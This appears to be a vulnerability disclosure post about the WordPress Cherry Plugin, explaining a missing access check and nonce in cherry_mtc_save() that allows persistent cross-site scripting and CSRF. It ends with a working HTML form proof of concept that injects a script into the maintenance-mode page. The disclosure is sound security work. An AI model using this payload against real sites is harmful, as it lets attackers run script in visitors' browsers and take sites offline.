Authenticated Persistent Cross-Site Scripting (XSS) Vulnerability in Cherry Plugin
As we continue looking at ways we can improve the security of WordPress plugins, one of the thing we are trying is checking over plugins that we have recently added new vulnerabilities to our data set to see if we can find any other obvious vulnerabilities. The third we have spotted is in the plugin Cherry Plugin.
We recently added two vulnerabilities to our data set that existed in older version of the plugin, which were caused by having code that was only intended to be used by Administrator level users accessible to anyone (you didn’t even have to be logged in). The vulnerability we found shows that the developers still are having problems with properly restricting access in the plugins. In this case the function cherry_mtc_save(), which is located in the file /includes/plugin-assets.php, is made accessible to any logged in user through an AJAX request. Since it is also only used through the Maintenance Mode page for the plugin, which is only accessible to Administrators, the function should have restrictions to prevent lower level users from accessing it. That isn’t the case:
69 70 71 72 73 | function cherry_mtc_save() { $post_date = isset($data) ? $data : $_POST['data'] ; update_option('mtc_options', $post_date); exit(); } |
You can see that there is also no nonce check in the function, so the function can also be exploited through cross-site request forgery (CSRF).
The function saves changes to the settings for the plugin’s maintenance mode. With that a lower level user could turn on the plugin’s maintenance mode, which would be a nuisance on its own. But a real security risk comes from the fact that they can set the description that is shown on the page shown when the maintenance mode is on to include JavaScript code, meaning there is a persistent cross-site scripting (XSS) vulnerability.
You can see that no sanitization is done when the settings are saved and then when it is output in the file /includes/plugin-under-construction-content.php:
69 70 | if(isset($mtc_options['mtc_mode_description'])){ ?>
<p id="under_construction_description"><?php echo stripslashes( $mtc_options['mtc_mode_description'] ); ?></p> |
It isn’t clear if the developer intended for Administrators to use JavaScript in that field or if they just hadn’t bothered to sanitize or escape the value.
Proof of Concept
The following proof of concept will turn on the maintenance mode and display an alert reading XSS, when submitted while logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="mtc_save" />
<input type="hidden" name="data[mtc_mode_on]" value="1" />
<input type="hidden" name="data[mtc_mode_description]" value='/><script>alert("XSS");</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Timeline
- 6/23/2016 – Developer notified.